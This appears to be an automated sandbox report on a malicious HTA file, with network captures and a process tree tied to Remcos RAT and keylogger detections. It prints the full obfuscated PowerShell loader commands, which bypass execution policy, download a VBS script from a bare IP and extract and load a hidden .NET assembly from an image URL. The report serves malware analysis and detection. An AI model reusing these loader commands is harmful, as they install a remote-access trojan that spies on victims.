                                                                                              Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nDozQzMwIDpyAqMEKDgywnMwJDWygkM4IDKygRMoHD2xQdMQHDzxgcMEHDwxwbM4GDrxgaMkGDoxwZMYGDlxAZMMGDixgWMkFDYAAAAQCwBQAAAAADLwgBMQAAAAABAGAPAAAwP8/D9/w+Pk/D4/g9PE/Dv/g6Pg+Dm/A5PM+Di/Q4PA+De/Q3Ps9DW/A1P88DN/wyPk8DA+gvPw7D7+AtPw6Dr+ApPw5DU+AjPQ0D89AdPw2Dk9AXPQ1DM9ABPwzD08ALPQyDc8AFPwwDE7A/OQvDs7A5OwtDU7AzOUsDE7ggOorDy6gqOIqDa6gkOooDC5geOInDx5gaOImDb5AWOAlDI5AAOgjDw4AKOAiDY4wEOEhDQ4gDOwgDK4QCOIgDB3w9NUfDy3Q6NUeDk3g4NsdDa3A2NAdDP3ggN8bD32AtNIbDt2wqNoaDp2wpNUaDj2gnNwZDb2gmNgZDW2AlN8YDN2AiNYYDF2AhNIYDA1gfNkXD31gdNQXDy1AcN8WDo1wZNcVDT1gRNQUDB0QPNATDu0wKNcSDa0AGNURDR0ABNIMD/zw+M4ODszQ6MUODYzg1MMNDPzgwMAID9yQuMwKDqywpMUKDjyglMQJDRywjM0IDAxgfMsHD5xwdMoGDoxQZMEGDUxgUM8EDLwgPMwDAABgJAGAOAAAAPAzDq8AKPcyDm8gIPEyDd8wFPU
                                                                                              Jan 14, 2025 06:13:20.239497900 CET1236INData Raw: 78 44 55 38 77 45 50 49 78 44 52 38 41 45 50 77 77 44 4c 38 77 42 50 45 73 44 2f 37 67 2f 4f 30 76 44 38 37 77 2b 4f 6f 76 44 32 37 51 39 4f 45 76 44 72 37 51 36 4f 67 75 44 6e 37 67 35 4f 55 75 44 68 37 41 34 4f 77 74 44 57 37 41 31 4f 4d 74 44
                                                                                              Data Ascii: xDU8wEPIxDR8AEPwwDL8wBPEsD/7g/O0vD87w+OovD27Q9OEvDr7Q6OguDn7g5OUuDh7A4OwtDW7A1OMtDS7Q0OAtDM7wyOcsDB6wvO4rD96QuOgrD06wsO8qDp6wpOYqDi6AnOopDZ6AmOcpDT6QjOwoDG6AhOMoDC6QgOAkD85weOcnDx5wbO4mDq5QaOUmDf5QXOwlDb5wVOYlDS5ATOokDJ5ASOckDG5gQOEgD94wNOUjD0
                                                                                              Jan 14, 2025 06:13:20.239530087 CET1236INData Raw: 41 58 4f 6f 6c 44 59 35 67 56 4f 51 6c 44 53 35 41 55 4f 34 6b 44 4d 35 67 53 4f 67 6b 44 47 35 41 52 4f 49 6b 44 41 34 67 50 4f 77 6a 44 36 41 41 51 41 51 44 67 42 41 41 41 41 41 34 44 35 2b 77 74 50 55 37 44 7a 2b 51 73 50 38 36 44 74 2b 77 71
                                                                                              Data Ascii: AXOolDY5gVOQlDS5AUO4kDM5gSOgkDG5AROIkDA4gPOwjD6AAQAQDgBAAAAA4D5+wtPU7Dz+QsP86Dt+wqPk6Dn+QpPM6Dh+wnP05Db+QmPc5DV+wkPE5DP+QjPs4DJ+whPU4DD+QQP83D99wePk3D39QdPM3Dx9wbP02Dr9QaPc2Dl9wYPE2Df9QXPs1DZ9wVPU1DT9QUP80DN9wSPk0DH9QRPM0DB8wPP0zD78QOPczD18wMP
                                                                                              Jan 14, 2025 06:13:20.239562035 CET1236INData Raw: 78 44 5a 38 41 47 50 63 78 44 57 38 51 46 50 51 78 44 54 38 67 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 73 77 44 4b 38 51 43 50 67 77 44 48 38 67 42 50 55 77 44 45 38 77 41 50 49 77 44 42 38 41 77 4f 38 76 44 2b 41 41 41 41 67 44 51
                                                                                              Data Ascii: xDZ8AGPcxDW8QFPQxDT8gEPExDQ8wDP4wDN8ADPswDK8QCPgwDH8gBPUwDE8wAPIwDB8AwO8vD+AAAAgDQBQDAAA0Dx9AcP82Du9QbPw2Dr9gaPk2Do9wZPY2Dl9AZPM2Di9AYP81De9QXPw1Db9QWPY1DV9AVPM1DS9QUPA1DP9QTPw0DL9gSPk0DI9wRPY0DE9gAAAAAXAUAwAsDi7Q4OAuDf7g3O0tDc7w2OotDZ7A2OctDW
                                                                                              Jan 14, 2025 06:13:20.239593983 CET1236INData Raw: 77 66 50 30 33 44 37 39 51 65 50 63 33 44 31 39 77 63 50 45 33 44 76 39 51 62 50 73 32 44 70 39 77 5a 50 55 32 44 6a 39 51 59 50 38 31 44 64 39 77 57 50 6b 31 44 58 39 51 56 50 4d 31 44 52 39 77 54 50 30 30 44 4c 39 51 53 50 63 30 44 46 39 77 51
                                                                                              Data Ascii: wfP03D79QePc3D19wcPE3Dv9QbPs2Dp9wZPU2Dj9QYP81Dd9wWPk1DX9QVPM1DR9wTP00DL9QSPc0DF9wQPEwD/8QPPszD58wNPUzDz8QMP8yDt8wKPkyDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyO
                                                                                              Jan 14, 2025 06:13:20.239624977 CET1236INData Raw: 44 6a 79 77 41 4d 4d 32 43 44 72 77 49 4b 4d 59 43 6a 6a 77 51 49 4d 36 42 44 63 77 59 47 4d 63 42 6a 55 77 67 45 4d 2b 41 44 4e 77 6f 43 4d 67 41 6a 46 77 77 41 4d 43 41 41 41 41 51 45 41 46 41 48 41 41 41 77 50 34 2f 6a 37 2f 51 2b 50 61 2f 44
                                                                                              Data Ascii: DjywAMM2CDrwIKMYCjjwQIM6BDcwYGMcBjUwgEM+ADNwoCMgAjFwwAMCAAAAQEAFAHAAAwP4/j7/Q+Pa/D0/Y8P8+js/g6Pe+Dl/A4P29Db/I2PY9DT/E0P38TL/MyPZ8zD/UgP77T8+UuPa7D0+YsP86js+cpP05TU+YjPb4DA9YfPs3j49gdPO3Dx9obPw2jp9wZPS2Di94XP11jT9YUPv0zC88MPRyDV8gBPJsj+7c8O/qz+
                                                                                              Jan 14, 2025 06:13:20.239660025 CET776INData Raw: 6f 4f 4e 64 54 6a 30 30 49 4a 4e 39 52 54 61 30 30 46 4e 55 4d 44 31 7a 45 38 4d 66 4f 54 65 7a 59 31 4d 4e 4d 44 43 7a 49 67 4d 39 4c 6a 57 79 38 51 4d 6f 48 44 74 78 49 53 4d 50 41 54 32 77 49 4b 4d 74 42 44 5a 77 59 46 4d 42 42 54 45 41 41 41
                                                                                              Data Ascii: oONdTj00IJN9RTa00FNUMD1zE8MfOTezY1MNMDCzIgM9LjWy8QMoHDtxISMPAT2wIKMtBDZwYFMBBTEAAAAgCABgDwP6/z7/s9PQ/zy/o6P91za9AVPYwDw8ALPmyTm88IPAyjZ88FPYxTU84BPJwDB7M/Opvzy786Oduzi7w3OCkT+5IdOnlDQ4sZNSXzs1UENqTTiz07MwODqzsnMFJjAxEeMZHTwx0KMgDTswEEAAAAdAQA0
                                                                                              Jan 14, 2025 06:13:20.239691973 CET1236INData Raw: 63 68 4d 34 4c 44 33 79 77 70 4d 47 4b 44 41 78 38 65 4d 61 48 7a 70 78 55 55 4d 2b 41 7a 63 77 77 47 41 41 41 41 68 41 51 41 6f 41 41 41 41 39 77 44 50 43 74 44 76 37 67 6d 4f 46 71 7a 66 36 30 6d 4f 78 6f 6a 4a 35 49 5a 4f 44 6c 54 45 34 45 75
                                                                                              Data Ascii: chM4LD3ywpMGKDAx8eMaHzpxUUM+AzcwwGAAAAhAQAoAAAA9wDPCtDv7gmOFqzf60mOxojJ5IZODlTE4EuNibDx20rNlajn28oN/ZDe2kzMuBAAAgDAEAJA+QkPo0zC8UNPqwjG7A8OduzZ7U1Oeoz46gsOYqzX5oeOcnz15ocO0mjn5cZO2lTW5MFOpYTL10VN+UDH04KNMSDf0cGNdNDvzc6MeOTkzY4MwMDKzMgM7LTzyYsM
                                                                                              Jan 14, 2025 06:13:20.239727974 CET1236INData Raw: 59 44 36 32 45 73 4e 4e 61 6a 52 32 30 6a 4e 73 59 7a 42 31 38 65 4e 6e 58 7a 32 31 6b 63 4e 77 57 44 71 31 45 61 4e 54 57 6a 68 31 45 59 4e 30 56 7a 62 31 59 57 4e 59 56 6a 55 31 63 55 4e 42 56 6a 4e 31 34 53 4e 6a 55 54 48 31 77 51 4e 48 51 44
                                                                                              Data Ascii: YD62EsNNajR20jNsYzB18eNnXz21kcNwWDq1EaNTWjh1EYN0Vzb1YWNYVjU1cUNBVjN14SNjUTH1wQNHQD+0UMNySDn0AJNDSjf0gEN2Mj8zQ3MdJzxy0nMlJjFysQMyGTkwoOMZCThwoHMvBjawAGMbBTQwYCAAAAvAQAMA8T+/E+Pp+zg/Y2Pw8jB+cOPJzDx8YJP1xDc80DP2wzF80APHsD674dOqnz35YaOdmjM5wSOmkDH
                                                                                              Jan 14, 2025 06:13:20.239764929 CET1236INData Raw: 55 34 4e 35 59 54 77 30 30 70 4d 76 46 6a 6a 78 38 58 4d 77 45 44 4a 78 4d 42 4d 34 44 6a 36 77 41 4f 4d 50 44 6a 76 77 67 4c 4d 71 43 7a 6e 77 4d 49 4d 76 42 7a 52 77 77 43 4d 6d 41 44 47 41 41 41 41 6f 42 77 41 41 43 77 50 33 2f 7a 35 2f 49 2b
                                                                                              Data Ascii: U4N5YTw00pMvFjjx8XMwEDJxMBM4Dj6wAOMPDjvwgLMqCznwMIMvBzRwwCMmADGAAAAoBwAACwP3/z5/I+Pl4zp+kkPe0z99kbPX2ji9gXPw1DP8gqOkpzU5wcOhlDX5QEO8jD310PNCTDt0YJNROjWzY1MSNjTzo0MGNjQz4zM6MjNzIzMuMjKzYyMiMjHzoxMWMjEz4wMKMjBzIgM+Lj+yYvMyLj7youMmLj4y4NAAAAgAMAc
                                                                                              Jan 14, 2025 06:13:20.244909048 CET1236INData Raw: 4a 44 54 79 4d 6b 4d 30 45 6a 33 78 45 63 4d 77 47 7a 6f 78 6f 5a 4d 4d 47 7a 67 78 6f 58 4d 4b 46 7a 51 78 38 43 4d 7a 44 7a 36 77 49 4f 4d 4f 42 7a 51 77 67 43 4d 61 41 7a 42 41 41 51 41 41 43 77 41 41 42 41 41 41 38 6a 36 2f 6b 37 50 70 2b 7a
                                                                                              Data Ascii: JDTyMkM0Ej3xEcMwGzoxoZMMGzgxoXMKFzQx8CMzDz6wIOMOBzQwgCMaAzBAAQAACwAABAAA8j6/k7Pp+zo/s4P29Dc/g1P58TM+kuPj7zo+UoPS5DS+gCP4yzg8kEP8wzN8YBPRwDD7c/OMvTZ7wjOtrjm6EoO5pjU6UUOdnz05EcO7mDt58ZOKmDd5MWOTlzR5QTOlgz/4kMOdiTE4oAOEcT+3I/NpfT43o9NSfzx307NzeTr


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.449740178.237.33.50808052C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Jan 14, 2025 06:13:21.988723993 CET71OUTGET /json.gp HTTP/1.1
                                                                                              Host: geoplugin.net
                                                                                              Cache-Control: no-cache
                                                                                              Jan 14, 2025 06:13:22.592828989 CET1171INHTTP/1.1 200 OK
                                                                                              date: Tue, 14 Jan 2025 05:13:22 GMT
                                                                                              server: Apache
                                                                                              content-length: 963
                                                                                              content-type: application/json; charset=utf-8
                                                                                              cache-control: public, max-age=300
                                                                                              access-control-allow-origin: *
                                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                              Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7126", "geoplugin_longitude":"-74.0066", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:00:12:54
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:mshta.exe "C:\Users\user\Desktop\verynicegirlwalkingarounftheworldmuuuah.hta"
                                                                                              Imagebase:0xe40000
                                                                                              File size:13'312 bytes
                                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:00:12:55
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\system32\cmd.exe" "/C POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:00:12:55
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:3
                                                                                              Start time:00:12:55
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"
                                                                                              Imagebase:0x9f0000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:4
                                                                                              Start time:00:12:58
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.cmdline"
                                                                                              Imagebase:0x970000
                                                                                              File size:2'141'552 bytes
                                                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:5
                                                                                              Start time:00:12:58
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8DF2.tmp" "c:\Users\user\AppData\Local\Temp\2qf3pwzp\CSCB3A240E1501D48929A893BA197F62C4E.TMP"
                                                                                              Imagebase:0x1d0000
                                                                                              File size:46'832 bytes
                                                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:00:13:02
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS"
                                                                                              Imagebase:0xba0000
                                                                                              File size:147'456 bytes
                                                                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:7
                                                                                              Start time:00:13:03
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                                                                                              Imagebase:0x9f0000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:8
                                                                                              Start time:00:13:03
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0xd00000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:12
                                                                                              Start time:00:13:19
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                              Imagebase:0xce0000
                                                                                              File size:108'664 bytes
                                                                                              MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4102227044.0000000001355000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4104782435.0000000002EAF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
